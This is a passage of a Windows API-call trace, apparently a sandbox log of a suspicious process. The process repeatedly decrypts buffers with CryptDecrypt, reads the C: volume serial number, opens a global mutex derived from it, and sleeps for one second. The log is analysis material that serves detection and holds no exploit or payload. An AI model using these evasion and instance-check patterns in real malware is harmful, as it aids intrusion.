hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0206.786] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0206.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0206.787] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0206.787] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0206.787] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0206.787] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0206.787] CryptDestroyKey (hKey=0xa32a28) returned 1 [0206.787] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f54f8 [0206.787] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x108 [0206.787] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0x0) returned 0x102 [0206.787] CloseHandle (hObject=0x108) returned 1 [0206.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0206.787] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f54f8 | out: hHeap=0x20f0000) returned 1 [0206.787] Sleep (dwMilliseconds=0x3e8) [0207.800] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0207.800] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0207.801] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0207.801] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0207.801] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.801] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0207.801] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0207.801] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x22277c0 [0207.801] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0207.801] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0207.801] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277c0, pdwDataLen=0x221f7e4 | out: pbData=0x22277c0, pdwDataLen=0x221f7e4) returned 1 [0207.801] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.801] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277c0 | out: hHeap=0x20f0000) returned 1 [0207.801] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0207.801] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0207.801] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0207.801] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0207.801] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0207.801] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0207.801] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0207.801] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0207.801] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0207.801] CryptDestroyKey (hKey=0xa32a28) returned 1 [0207.801] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f54f8 [0207.801] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x108 [0207.802] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0x0) returned 0x102 [0207.802] CloseHandle (hObject=0x108) returned 1 [0207.802] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0207.802] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f54f8 | out: hHeap=0x20f0000) returned 1 [0207.802] Sleep (dwMilliseconds=0x3e8) [0209.391] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0209.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32928) returned 1 [0209.391] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0209.391] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0209.391] CryptDestroyKey (hKey=0xa32928) returned 1 [0209.391] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0209.391] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0209.391] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x22277c0 [0209.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32928) returned 1 [0209.391] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0209.391] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277c0, pdwDataLen=0x221f7e4 | out: pbData=0x22277c0, pdwDataLen=0x221f7e4) returned 1 [0209.391] CryptDestroyKey (hKey=0xa32928) returned 1 [0209.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277c0 | out: hHeap=0x20f0000) returned 1 [0209.391] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0209.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0209.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0209.391] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0209.391] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0209.391] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0209.391] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32928) returned 1 [0209.392] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0209.392] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0209.392] CryptDestroyKey (hKey=0xa32928) returned 1 [0209.392] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f54f8 [0209.392] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xfc [0209.392] WaitForSingleObject (hHandle=0xfc, dwMilliseconds=0x0) returned 0x102 [0209.392] CloseHandle (hObject=0xfc) returned 1 [0209.392] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0209.392] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f54f8 | out: hHeap=0x20f0000) returned 1 [0209.392] Sleep (dwMilliseconds=0x3e8) [0211.684] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0211.684] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0211.684] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0211.684] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0211.684] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.684] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0211.684] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0211.684] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x22277c0 [0211.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0211.685] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0211.685] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22277c0, pdwDataLen=0x221f7e4 | out: pbData=0x22277c0, pdwDataLen=0x221f7e4) returned 1 [0211.685] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.685] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x22277c0 | out: hHeap=0x20f0000) returned 1 [0211.685] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0211.685] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0211.685] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0211.685] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0211.685] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0211.685] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0211.685] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0211.685] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0211.685] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0211.685] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.685] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f54f8 [0211.685] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x108 [0211.685] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0x0) returned 0x102 [0211.685] CloseHandle (hObject=0x108) returned 1 [0211.685] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0211.685] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f54f8 | out: hHeap=0x20f0000) returned 1 [0211.685] Sleep (dwMilliseconds=0x3e8) [0213.017] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9d8 [0213.017] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328e8) returned 1 [0213.017] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0213.017] CryptDecrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9d8, pdwDataLen=0x221f80c | out: pbData=0x20fd9d8, pdwDataLen=0x221f80c) returned 1 [0213.018] CryptDestroyKey (hKey=0xa328e8) returned 1 [0213.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fda00 [0213.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fda28 [0213.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20fc2e8 [0213.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328e8) returned 1 [0213.018] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0213.018] CryptDecrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x221f7e4 | out: pbData=0x20fc2e8, pdwDataLen=0x221f7e4) returned 1 [0213.018] CryptDestroyKey (hKey=0xa328e8) returned 1 [0213.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0213.018] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fda00, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0213.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda28 | out: hHeap=0x20f0000) returned 1 [0213.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0213.018] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda00 | out: hHeap=0x20f0000) returned 1 [0213.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0213.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328e8) returned 1 [0213.018] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0213.018] CryptDecrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0213.018] CryptDestroyKey (hKey=0xa328e8) returned 1 [0213.018] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0213.018] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x140 [0213.018] WaitForSingleObject (hHandle=0x140, dwMilliseconds=0x0) returned 0x102 [0213.018] CloseHandle (hObject=0x140) returned 1 [0213.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0213.018] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0213.018] Sleep (dwMilliseconds=0x3e8) [0214.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fda00 [0214.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0214.225] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0214.225] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fda00, pdwDataLen=0x221f80c | out: pbData=0x20fda00, pdwDataLen=0x221f80c) returned 1 [0214.225] CryptDestroyKey (hKey=0xa328a8) returned 1 [0214.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9d8 [0214.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fda28 [0214.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20fc2e8 [0214.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0214.225] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0214.225] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x221f7e4 | out: pbData=0x20fc2e8, pdwDataLen=0x221f7e4) returned 1 [0214.225] CryptDestroyKey (hKey=0xa328a8) returned 1 [0214.225] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0214.225] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9d8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0214.225] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda28 | out: hHeap=0x20f0000) returned 1 [0214.225] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda00 | out: hHeap=0x20f0000) returned 1 [0214.225] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0214.225] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0214.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0214.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0214.225] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0214.225] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0214.225] CryptDestroyKey (hKey=0xa328a8) returned 1 [0214.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0214.225] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x238 [0214.225] WaitForSingleObject (hHandle=0x238, dwMilliseconds=0x0) returned 0x102 [0214.225] CloseHandle (hObject=0x238) returned 1 [0214.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0214.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0214.226] Sleep (dwMilliseconds=0x3e8) [0215.225] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9d8 [0215.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0215.225] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0215.225] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9d8, pdwDataLen=0x221f80c | out: pbData=0x20fd9d8, pdwDataLen=0x221f80c) returned 1 [0215.225] CryptDestroyKey (hKey=0xa328a8) returned 1 [0215.226] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fda00 [0215.226] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fda28 [0215.226] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20fc2e8 [0215.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0215.226] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0215.226] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x221f7e4 | out: pbData=0x20fc2e8, pdwDataLen=0x221f7e4) returned 1 [0215.226] CryptDestroyKey (hKey=0xa328a8) returned 1 [0215.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0215.226] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fda00, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0215.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda28 | out: hHeap=0x20f0000) returned 1 [0215.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0215.226] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fda00 | out: hHeap=0x20f0000) returned 1 [0215.226] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0215.226] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa328a8) returned 1 [0215.226] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0215.226] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0215.226] CryptDestroyKey (hKey=0xa328a8) returned 1 [0215.226] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0215.226] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x238 [0215.226] WaitForSingleObject (hHandle=0x238, dwMilliseconds=0x0) returned 0x102 [0215.226] CloseHandle (hObject=0x238) returned 1 [0215.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0215.226] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0215.226] Sleep (dwMilliseconds=0x3e8) [0216.240] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fda00 [0216.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa328a8) returned 1 [0216.240] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0216.241] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fda00, pdwDataLen=0x221f80c | out: pbData=0x20fda00, pdwDataLen=0x221f80c) returned 1 [0216.241] CryptDestroyKey (hKey=0xa328a8) returned 1 [0216.241] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9d8 [0216.241] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fda28 [0216.241] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20fc2e8 [0216.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa328a8) returned 1 [0216.241] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0216.241] CryptDecrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x221f7e4 | out: 